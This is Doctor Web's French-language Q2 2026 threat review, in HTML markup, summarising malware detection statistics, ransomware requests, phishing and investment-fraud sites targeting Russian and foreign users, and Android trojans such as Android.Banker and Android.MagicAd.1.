&lt;p&gt;Parmi les applications malveillantes ciblant les appareils Android, la première place en termes de nombre de détections sur les appareils protégés a été gardée par les Trojans bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Parallèlement, les auteurs de virus ont continué d'utiliser activement divers outils pour modifier les applications Android et ainsi protéger leurs logiciels malveillants contre la détection par les antivirus. Au cours du deuxième trimestre, nos analystes antivirus ont également découvert plusieurs nouveaux chevaux de Troie dans le catalogue Google Play, conçus pour abonner les utilisateurs à des services mobiles payants.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendances principales du deuxième trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Le nombre de menaces détectées sur les appareils protégés a augmenté.&lt;/li&gt;
        &lt;li&gt;Le nombre de fichiers uniques parmi les menaces détectées a augmenté de manière significative.&lt;/li&gt;
        &lt;li&gt;Le nombre de demandes de déchiffrement de fichiers affectés par des rançongiciels a diminué par rapport au premier trimestre.&lt;/li&gt;
        &lt;li&gt;Les fraudeurs ont commencé à attaquer plus fréquemment les utilisateurs de la messagerie russe MAX.&lt;/li&gt;
        &lt;li&gt;Les Trojans bancaires &lt;b&gt;Android.Banker&lt;/b&gt; restent le malware le plus courant ciblant les appareils Android.&lt;/li&gt;
        &lt;li&gt;Les spécialistes de Doctor Web ont découvert le cheval de Troie publicitaire &lt;b&gt;Android.MagicAd.1&lt;/b&gt;, capable de contourner les restrictions du système d'exploitation Android et d'afficher des publicités en arrière-plan.&lt;/li&gt;
        &lt;li&gt;Les auteurs de virus ont diffusé le logiciel malveillant JobStealer, conçu pour voler des données confidentielles aux utilisateurs de Mac et de Windows.&lt;/li&gt;
        &lt;li&gt;Du code malveillant a été découvert dans une mise à jour de Microsoft Visual Studio Code.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Données du service de statistiques de Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les menaces les plus répandues au cours du 2eme trimestre 2026&amp;nbsp;:&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Adware.Downware.20091&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Adware souvent utilisé comme outil intermédiaire de téléchargement de programmes pirates.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie écrit dans le langage de programmation Go et conçu pour charger divers miners et logiciels publicitaires dans le système cible. Le malware est un fichier DLL situé dans &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Pour son lancement, il exploite une vulnérabilité de la classe DLL Search Order Hijacking dans le client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Composant malveillant de l'extension de navigateur WinSafe. Ce composant est un script JavaScript qui affiche des publicités intrusives dans les navigateurs.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Starter.8319&lt;/dt&gt;
    &lt;dd&gt;Détection de scripts XML malveillants qui lancent le Trojan &lt;a href="https://vms.drweb.fr/search/?q=Trojan.AutoIt.289&amp;lng=fr"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; et ses composants.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiques relatives aux programmes malveillants détectés dans le trafic e-mail&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les menaces les plus courantes dans le trafic de messagerie au deuxième trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;X97M.DownLoader.2343&lt;/dt&gt;
    &lt;dd&gt;Un fichier XLSX (format de feuille de calcul Microsoft Excel) contenant un objet OLE qui télécharge un fichier malveillant sur l'ordinateur cible.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Famille de Trojans Downloaders qui exploitent les vulnérabilités des documents créés dans MS Office. Ils sont conçus pour télécharger d'autres logiciels malveillants sur l'ordinateur attaqué.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Exploits conçus pour exploiter des vulnérabilités dans le logiciel Microsoft Office et qui permettent l'exécution du code arbitraire.&lt;/dd&gt;
    &lt;dt&gt;JS.Muldrop.1171&lt;/dt&gt;
    &lt;dd&gt;Script malveillant au format JavaScript qui lance un malware caché sur le système cible.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Rançongiciels&lt;/h3&gt;

&lt;p&gt;Par rapport au premier trimestre 2026, le nombre de demandes de déchiffrement de fichiers touchés par des ransomwares à chiffrement a légèrement diminué au deuxième trimestre (de 2,67 %).&lt;/p&gt;

&lt;p&gt;Dynamique des demandes de décryptage reçues par le support technique de Doctor Web&amp;nbsp;:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les encodeurs les plus répandus au cours du 2eme trimestre 2026&amp;nbsp;:&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 14,47% des demandes&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 5,26% des demandes&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.37400&lt;/b&gt; — 3,95% des demandes&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.fr/search/?q=Trojan.Encoder.35209&amp;lng=fr"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3,29% des demandes&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44197&lt;/b&gt; — 2,63% des demandes&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Fraude sur le Web&lt;/h3&gt;

&lt;p&gt;L'une des tendances observées par les analystes de Doctor Web au deuxième trimestre 2026 l’augmentation de l’intérêt des cybercriminels pour les utilisateurs de la messagerie russe MAX. Face à la croissance de son audience, les pirates informatiques ont commencé à cibler activement les utilisateurs de ce service. Ils utilisent également des techniques bien connues qui ont déjà visé les utilisateurs d'autres messageries, telles que Telegram et WhatsApp. Par exemple, nos spécialistes ont identifié de nombreux sites web frauduleux créés pour voler des comptes MAX sous couvert de divers programmes de vote. Une victime potentielle est invitée à voter pour un concours, en saisissant son numéro de téléphone portable ainsi que le code de vérification reçu après la saisie. Une fois que l'utilisateur a saisi toutes les données, les attaquants obtiennent l'accès à son compte.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Voici un exemple de site de phishing utilisé par des escrocs pour accéder au compte de messagerie MAX d'une victime.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Au cours du deuxième trimestre, les analystes Internet de Doctor Web ont constaté l'apparition de nouveaux sites web frauduleux liés aux investissements. Les cybercriminels suivent les tendances actuelles et continuent d'exploiter activement le sujet de l'intelligence artificielle. Par exemple, sur plusieurs plateformes en ligne, ils invitaient leurs victimes potentielles à participer à un nouveau projet d'investissement, prétendument lié à d'importantes institutions de crédit russes. Les attaquants promettaient l'accès à un chatbot spécialisé, basé sur le réseau neuronal ChatGPT, qui pouvait faciliter les investissements. Pour devenir participants au «&amp;nbsp;projet&amp;nbsp;», les visiteurs du site devaient s'inscrire en fournissant des informations personnelles.
&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le site frauduleux propose de s'inscrire dans un projet d'investissement prétendument lié à l'une des banques russes et d'accéder à un chatbot financier spécialisé basé sur le réseau neuronal ChatGPT.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dans le même temps, des escrocs ont tenté d'attirer les utilisateurs russophones en utilisant non seulement les noms de banques russes, mais également ceux d'établissements de crédit étrangers. Par exemple, des cybercriminels ont présenté plusieurs faux sites de services d'investissement en les présentant comme étant affiliés à des banques sud-coréennes.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un site web frauduleux proposait aux utilisateurs russophones de participer à un "&amp;nbsp;projet d'investissement d'une banque sud-coréenne&amp;nbsp;", promettant un revenu de 2&amp;nbsp;000&amp;nbsp;000 de wons sud-coréens.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Au deuxième trimestre, les escrocs sont restés actifs, tentant de dérober des identifiants de compte auprès de divers services. Parmi les nombreux sites de phishing, on trouvait de faux sites web se faisant passer pour des entreprises de transport. L'un d'eux ciblait les clients d'un service de livraison express russe. Les victimes potentielles étaient invitées à se connecter à leur compte à l'aide du numéro de téléphone portable associé à celui-ci ou via le portail des services de l’État Gosuslugi. Même après s'être connectées par la première méthode, le site affichait un second formulaire de phishing, se faisant passer pour une page de connexion du portail des services de l’État Gosuslugi.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Grâce à un site web frauduleux, des pirates ont pu dérober simultanément des identifiants de connexion à plusieurs comptes&amp;nbsp;: d'un compte personnel sur le site web d’une entreprise de transport et du portail des services de l’État Gosuslugi.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nos experts ont également identifié de nouveaux sites de phishing ciblant des établissements de crédit dans différents pays. Par exemple, des escrocs ont demandé aux clients d'une banque américaine de se connecter à leurs comptes et de vérifier la disponibilité d'un taux d'intérêt plus élevé pour les «&amp;nbsp;clients fidèles&amp;nbsp;».&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Dans un autre cas, un site de phishing imitait l'apparence d'une banque équatorienne et demandait aux utilisateurs leurs identifiants de connexion à la banque en ligne.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Une autre escroquerie par phishing ciblait des utilisateurs britanniques. Des cybercriminels ont créé de faux sites web de services gouvernementaux proposant de payer les amendes de stationnement.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les victimes potentielles étaient invitées à fournir des informations personnelles détaillées, soi-disant pour vérifier leur identité, après quoi elles étaient redirigées vers une page de paiement d'une «&amp;nbsp;amende&amp;nbsp;».&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;L'une des escroqueries les plus courantes consiste à annoncer aux utilisateurs une possibilité de recevoir divers paiements indus. Cependant, les cybercriminels l'adaptent constamment à l'actualité. Par exemple, à l'approche de la Fête nationale russe, de faux sites web d'établissements de crédit russes ont commencé à apparaître, des escrocs promettant des versements spéciaux aux visiteurs à l'occasion de la fête. L'un d'eux aurait proposé aux utilisateurs entre 5&amp;nbsp;000 et 300&amp;nbsp;000 roubles pour répondre à un sondage.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Dans une autre version de ce système, les utilisateurs pouvaient espérer recevoir une «&amp;nbsp;aide&amp;nbsp;» de 5&amp;nbsp;000 roubles après avoir rempli un sondage.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Face aux rumeurs de pénurie de carburant dans certaines régions russes, plusieurs de ces sites ont promis des bons pour 20 à 100 litres de carburant gratuits&amp;nbsp;:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Après avoir répondu à quelques questions simples, les visiteurs de ces sites étaient invités à se soumettre à une «&amp;nbsp;identification personnelle&amp;nbsp;» pour recevoir la récompense promise. Il fallait fournir nom et prénom, un numéro de téléphone portable et un numéro de carte bancaire. Les escrocs pouvaient ensuite utiliser ces informations pour voler l'argent de leurs victimes.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Parmi les sites web indésirables détectés au deuxième trimestre figuraient également de faux sites web de la FIFA, où les utilisateurs pouvaient soi-disant acheter des billets officiels pour la Coupe du monde de la FIFA 2026, des souvenirs de marque et divers services premium. Tout comme sur le site officiel, les visiteurs de ces faux sites étaient invités à se connecter à un compte FIFA ID, mais le formulaire d'identification acceptait dans ce cas n'importe quelles données.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Formulaire de connexion pour faux compte FIFA&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Après avoir sélectionné le produit qui les intéressait, les fans de football étaient invités à finaliser leur achat et à payer. Parallèlement, lors du processus de paiement, les utilisateurs étaient redirigés vers le site Internet de l'un des services, qui se trouve dans la base de données des ressources Internet non recommandées par l'antivirus Dr.Web.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le faux site Internet de la Fédération Internationale de Football aurait permis l'achat officiel de produits et services sous licence&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nos experts ont également identifié plusieurs campagnes de spam visant à diffuser des liens vers de faux sites web de marché russes, où les attaquants offraient aux victimes potentielles la possibilité de participer à un «&amp;nbsp;tirage au sort de prix d'anniversaire&amp;nbsp;». Les escrocs promettaient la possibilité de gagner des prix en espèces&amp;nbsp;– jusqu'à 1&amp;nbsp;000&amp;nbsp;000 de roubles&amp;nbsp;– ainsi que des ordinateurs et des appareils mobiles.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Pour participer à cette «&amp;nbsp;promotion&amp;nbsp;», les utilisateurs devaient cliquer sur le bouton prévu à cet effet sur ces sites web, après quoi un tirage au sort simulé était censé avoir lieu. Après plusieurs tentatives, la victime potentielle s'est vu dire qu'elle avait gagné plusieurs cadeaux et qu'elle avait soi-disant le choix&amp;nbsp;: récupérer les prix en personne dans un point de retrait sur le marché, ou leur équivalent en espèces par virement bancaire&amp;nbsp;:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Lorsqu'un utilisateur choisissait de récupérer ses prix en point relais, les sites web l'informaient que les articles souhaités étaient indisponibles, mais qu'il pouvait néanmoins les échanger contre de l'argent. La page simulait ensuite une conversation avec un opérateur afin de «&amp;nbsp;confirmer&amp;nbsp;» son intention de convertir ses prix. Pour ce faire, la victime potentielle devait fournir un numéro de carte bancaire&amp;nbsp;:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Après sa saisie, les sites web exigeaient le paiement de frais d’État pour «&amp;nbsp;enregistrer officiellement les gains&amp;nbsp;».&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les victimes de ces escrocs n'ont jamais reçu le moindre prix. Elles leur ont non seulement communiqué leurs coordonnées bancaires, mais également transféré leur propre argent.&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.fr/dangerous_urls/?lng=fr" target="_blank" rel="noopener"&gt;En savoir plus sur les sites non recommandés par Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Logiciels malveillants et indésirables ciblant les appareils mobiles&lt;/h3&gt;

&lt;p&gt;Selon les statistiques de détection de Dr.Web Security Space pour les appareils mobiles, au deuxième trimestre 2026, les utilisateurs ont rencontré moins fréquemment les Trojans bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, cependant, ces applications de type cheval de Troie sont restées les logiciels malveillants les plus courants. L’activité des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; a également diminué.&lt;/p&gt;

&lt;p&gt;Les programmes potentiellement dangereux les plus fréquemment détectés au cours du deuxième trimestre étaient les applications &lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Tool.NPMod&amp;lng=fr"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;, modifiées à l'aide de l'utilitaire de modification NP Manager. Les auteurs de virus utilisent cet outil pour protéger les logiciels malveillants contre la détection par les logiciels antivirus. Les programmes indésirables les plus courants se sont avérés être de faux antivirus nommés &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;. Pour «&amp;nbsp;remédier&amp;nbsp;» aux menaces prétendument découvertes, ils exigent l'achat de la version complète.&lt;/p&gt;

&lt;p&gt;Les logiciels publicitaires les plus actifs étaient les modules &lt;a href="https://vms.drweb.fr/search/?q=Adware.AdPush&amp;lng=fr"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, qui affichaient des notifications trompeuses et collectaient des données confidentielles. Les applications d'optimisation du système d'exploitation Android se sont à nouveau répandues. Il s'agit des applications &lt;a href="https://vms.drweb.fr/search/?q=Adware.Bastion&amp;lng=fr"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Elles créent des notifications contenant des messages concernant une mémoire vive prétendument insuffisante et des erreurs système afin d'afficher des publicités pendant «&amp;nbsp;l'optimisation&amp;nbsp;». Les programmes publicitaires &lt;b&gt;Adware.Opensite.15&lt;/b&gt; ont également restés très actifs. Les pirates les distribuent sous couvert de programmes de triche, censés permettre aux utilisateurs d'obtenir diverses ressources en jeu. En réalité, ces programmes ne font que surcharger les sites web de publicités.
&lt;/p&gt;

&lt;p&gt;En juin, les spécialistes de Doctor Web ont &lt;a href="https://news.drweb.fr/show/?lng=fr&amp;i=15262" target="_blank"&gt;mis en garde contre le Trojan&lt;/a&gt; &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, capable de contourner les restrictions du système d'exploitation Android et d'afficher des publicités en arrière-plan. &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; utilise à cette fin des applications tierces, ainsi qu'un certain nombre de méthodes qu'il sélectionne en fonction du fabricant de l'appareil cible.&lt;/p&gt;

&lt;p&gt;Au cours du deuxième trimestre, nos analystes ont identifié de nouveaux programmes de type chevaux de Troie appartenant aux familles  &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; dans le catalogue Google Play, ces applications abonnent les utilisateurs à des services payants. Au total, ils ont été téléchargés au moins 2&amp;nbsp;600&amp;nbsp;000 de fois.&lt;/p&gt;

&lt;p&gt;Les événements les plus importants du deuxième trimestre en matière de sécurité des appareils mobiles&amp;nbsp;:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Les chevaux de Troie bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; ont gardé leur première place en termes de nombre de détections de logiciels malveillants sur les appareils protégés par Dr.Web.&lt;/li&gt;
    &lt;li&gt;Les attaquants ont continué à utiliser activement des outils spécialisés pour modifier les programmes Android afin de protéger les chevaux de Troie bancaires contre la détection par les antivirus.&lt;/li&gt;
    &lt;li&gt;L'activité des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; a de nouveau diminué.&lt;/li&gt;
    &lt;li&gt;Les analystes antivirus de Doctor Web ont identifié le cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, qui exploite des programmes tiers pour contourner les restrictions du système d'exploitation Android et afficher des publicités en arrière-plan.&lt;/li&gt;
    &lt;li&gt;De nouvelles applications de type cheval de Troie ont été découvertes sur Google Play, incitant les utilisateurs à s'abonner à des services payants.&lt;/li&gt;
&lt;/ul&gt;

